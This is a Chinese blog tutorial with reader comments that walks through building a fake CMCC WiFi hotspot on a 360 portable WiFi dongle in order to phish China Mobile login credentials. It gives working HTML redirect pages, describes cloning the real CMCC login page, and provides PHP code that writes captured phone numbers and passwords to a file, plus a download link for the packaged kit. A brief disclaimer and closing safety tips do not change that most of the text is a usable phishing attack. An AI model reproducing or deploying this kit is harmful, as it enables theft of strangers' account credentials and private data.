360随身WiFi搭建CMCC钓鱼热点

文章目录 (?) [+]

    本文长时间未进行更新,文中所描述的信息可能已发生改变,请谨慎参考。

    文章内容仅供学习交流使用,请勿用于非法用途。

    360随身WiFi

            钓鱼热点虽说可用 WiFiDog 实现,但是实现起来比较复杂,由于只需要做到钓取账号密码,就不要做登录是否成功的判断及后续步骤。实现 360 随身 WiFi 有一个特点:当连接方式设置为“主人确认连接”,此时如有设备连接热点,360 随身 WiFi 就会在电脑上弹出连接请求。当请求未被同意,此时设备虽然能够连接热点,但没有网络访问权限,所有的网页请求都会被重定向到一个特定的网页上,这一点十分像 CMCC 的认证登录。本文就利用这一特点来搭建钓鱼热点,利用打开的那个特定网页作为跳板将所有 HTTP 请求二次重定向到登录页面,登录页面我们抓取 CMCC 的,本地使用 php 环境搭建简易认证系统,这样一个简单钓鱼热点就搭建完成。

    原理图

    热点设置

    热点安全防护设置

    重定向

            找到 360 随身 WiFi 重定向指向的页面 wifi.html(路径一般是 C:\Program Files\360\360AP\web\wifi.html),修改这个页面使其打开时跳转到登录页面,这样未同意的设备连接后打开任意网页就会跳转到登录页面。

            页面可以通过如下 2 种方法实现二次重定。

    <!DOCTYPE html>
    <html>
        <head>
            <title>欢迎使用</title>
            <meta http-equiv = "Content-Type" content = "text/html; charset = utf-8" />
        </head>
        <body>
            <script language = "javascript">document.location = "http://172.22.11.1:80/showlogin.dowlanuserip=211.137.185.106&wlanacname=0001.0000.000.00&ssid=CMCC&wlanparameter=2e67d27c82dfc8de62cd7d7a4942a37ff0d2eb72116e196a"</script>
        </body>
    </html>

    或者这样写

    <!DOCTYPE html>
    <html>
        <head>
            <title>欢迎使用</title>
            <meta http-equiv = "refresh" content = "0;url=http://172.22.11.1:80/showlogin.dowlanuserip=211.137.185.106&wlanacname=0001.0000.000.00&ssid=CMCC&wlanparameter=2e67d27c82dfc8de62cd7d7a4942a37ff0d2eb72116e196a">
        </head>
        <body>
            <br />
        </body>
    </html>

            需要说明的是,这里的 IP 172.22.11.1 是随身 WiFi 热点的 IPv4 地址,不同电脑的热点 IP 可能不太一样,具体的可以通过 cmd 的 ipconfig 命令查看;80 是网页服务默认的端口号,可以不写;后面的showlogin.dowlanuserip=211.137.185.106&wlanacname=0001.0000.000.00&ssid=CMCC&wlanparameter=2e67d27c82dfc8de62cd7d7a4942a37ff0d2eb72116e196a 是登录页面的根目录名称,这样写只是模仿 CMCC 的登录地址,起到一定的迷惑性,并没有其它用途。

    热点IPv4地址

    CMCC链接参数

    PHP 环境搭建

            为了记录手机号和登录密码,网页使用 php 语言来实现,php 的运行环境使用 phpStudy 一键搭建。设置的网站根目录是 D:\WWW\,将登录页面 index.php 和其它文件放在 D:\WWW\showlogin.dowlanuserip=211.137.185.106&wlanacname=0001.0000.000.00&ssid=CMCC&wlanparameter=2e67d27c82dfc8de62cd7d7a4942a37ff0d2eb72116e196a\ 目录下。

    phpStudy官网

    WWW目录结构

    登录页面

            登录页面是仿 CMCC 的,为了仿起来方便我就直接连接真正的 CMCC 用浏览器的查看其登录页面源代码,按原来的文件夹结构保存用到的 css、js、图片等文件,几乎不用修改就可以完美离线保存 CMCC 登录页面。添加php代码记录手机和登录密码,登录页面文件名修改为index.php,这样登录的手机号和密码就被记录在 pass.txt 里了。

    <!-- 需要修改的部分 -->
    
    <?php
        $acco = @$_POST['account'];
        $pass = @$_POST['password'];
        if((strlen($acco) == 11)&&(strlen($pass)>5)){
            $path = 'pass.txt';
            $f = fopen($path,'a');
            fwrite($f,"时间:");
            fwrite($f,date("Y-m-d H:i:s")."\t");
            fwrite($f,"账号:");
            fwrite($f,$acco."\t");
            fwrite($f,"密码:");
            fwrite($f,$pass."\r\n");
            fclose($f); 
        }
     ?>
     <div class="content">
    	<form class="form-signin" action="index.php" method="post" > 
    		<div class="loginContent">
    			<ul class="login">
    				<li>
    					<label for="username" class="sr-only">手机号码</label>
    					<input type="text" id="account" name="account" class="normal" size="12" maxlength="20" required />
    				</li>
    				<li>
    					<label for="password" class="sr-only">密 码</label>
    					<input type="password" id="password" name="password" class="normal" required />
    					<span class="loginCtrl">
    						<input value="获取短信密码" id="btnDynPwd" name="btnDynPwd" type="button" onclick="valifyApplyPwd()" />
    						<input type="hidden" id="cmccdynapw" name="cmccdynapw" value="" />
    					</span>
    				</li>
    				<li>
    					<span style="color: red">
    						山东省WLAN客户登录时发送806到10086获取登录密码。
    					</span>
    				</li>
    				<li>&nbsp;</li>
    				<li>
    					<label>&nbsp;</label>
    					<button class="btn btn-lg btn-primary btn-block" type="submit">登录</button>
    				</li>
    				<li>&nbsp;</li>
    			</ul>
    		</div>
    	</form>
    </div>
    
    <!-- 需要修改的部分 -->

    伪登录页面

    钓取到的账号密码

    简易 CMCC 钓鱼登录页面源码打包下载 访问密码 u6yj

    后记

            如果要实现认证登录,下面的这个文件可能会对你有所帮助。

            C:\Users\Administrator\AppData\Roaming\360AP\config.ini

            钓鱼 WiFi 不仅能钓取到 CMCC 账号和密码,通过 Wireshark、Fiddler 等抓包软件还可以抓取到用户的其它信息,正如央视“ 315 晚会”现场演示的那样,黑客利用虚假 WiFi 盗取晚会现场观众手机系统、品牌型号、自拍照片、邮箱帐号密码等各类隐私数据,甚至可以窃取到用户的银行账户、网络支付账户密码,从而实施资金的盗刷,即使是 CMCC 等熟悉的网络也一定要注意网络安全问题。

            几点建议

            第一,谨慎使用公共场合的 WiFi 热点。官方机构提供的而且有验证机制的 WiFi,可以找工作人员确认后连接使用。其他可以直接连接且不需要验证或密码的公共 WiFi 风险较高,背后有可能是钓鱼陷阱,尽量不使用。

            第二,使用公共场合的 WiFi 热点时,尽量不要进行网络购物和网银的操作,避免重要的个人敏感信息遭到泄露,甚至被黑客银行转账。

            第三,养成良好的 WiFi 使用习惯。手机会把使用过的 WiFi 热点都记录下来,如果 WiFi 开关处于打开状态,手机就会不断向周边进行搜寻,一旦遇到同名的热点就会自动进行连接,存在被钓鱼风险。因此当我们进入公共区域后,尽量不要打开 WiFi 开关,或者把 WiFi 调成锁屏后不再自动连接,避免在自己不知道的情况下连接上恶意 WiFi 。

            文章最后,祝大家元旦快乐。^_^

    本文标题:360随身WiFi搭建CMCC钓鱼热点
    本文链接:https://lanseyujie.com/post/360wifi-build-cmcc-fishing-hotspots.html
    版权声明:本文使用「署名-非商业性使用-相同方式共享」创作共享协议,转载或使用请遵守署名协议。
    点赞 0 分享 0
    本文已有2条留言:
    • 头像
      影乐  Meizu MX4Meizu MX4 UC Browser 10.8.8.730UC Browser 10.8.8.730
      发表于 2016-03-16 14:47:35 来自 美国 的朋友 回复该评论
    • 话说用抓包软件能不能抓取到畅无线的cmcc账号密码
      • 头像
        森林生灵 [作者]  Windows 10 x64Windows 10 x64 Google Chrome 49.0.2623.87Google Chrome 49.0.2623.87
        发表于 2016-03-17 12:22:56  回复该评论
      • 试过一次用Wireshark抓包,没有找到明文账号密码,或许用Fiddler会有所发现。